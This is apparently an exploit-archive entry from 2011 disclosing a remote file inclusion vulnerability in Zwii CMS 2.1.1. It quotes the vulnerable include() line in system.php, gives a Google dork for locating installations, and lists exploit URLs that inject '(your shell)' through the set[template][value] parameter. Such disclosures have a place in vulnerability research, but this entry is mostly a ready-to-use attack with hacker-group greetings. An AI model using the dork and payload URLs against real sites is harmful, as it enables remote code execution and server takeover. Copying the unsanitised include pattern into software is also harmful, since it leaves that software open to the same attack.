[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Zwii v 2.1.1 Remote File Inclusion Vulnerbility
# Published : 2011-01-08
# Author : Abdi Mohamed
# Previous Title : PHP MicroCMS 1.0.1 CSRF and XSS Vulnerabilities
# Next Title : Phenotype CMS 3.0 SQL Injection
# Exploit Title: Zwii v 2.1.1 Remote file include vulnerbility
# Google Dork: Propuls¨¦ par Zwii 2.1.1
# Date: 08/01/2011
# Author: Abdi Mohamed
# Software Link: http://scripts.toocharger.com/fiches/scripts/zwii/5147.htm
# Version: v 2.1.1
# Tested on: ubuntu + centos
# Email : abdimohamed@hotmail.fr - mrabdimohamed@gmail.com
#######################################################
Fichier : system.php
http://localhost/y/system/system.php
Code :
// Importe la base de donn¨¦es
include("./system/data/settings.php");
include("./system/data/articles.php");
include("./system/data/accounts.php");
include("./system/data/positions.php");
include("./system/data/ip.php");
include("./templates/". $set["template"]["value"] ."/info.php");
Exploit:
http://localhost/y/system/system.php?set=(your shell)
http://localhost/y/system/system.php?set[template][value]=(your shell)
#######################################################
# Gr33tz : meher assel - xa7m3d - yahya idriss - houssem jrad - all tunisien hacker's
# Gr33tz : all member | v4-team.com - sec-war.com - hacktn.com
#######################################################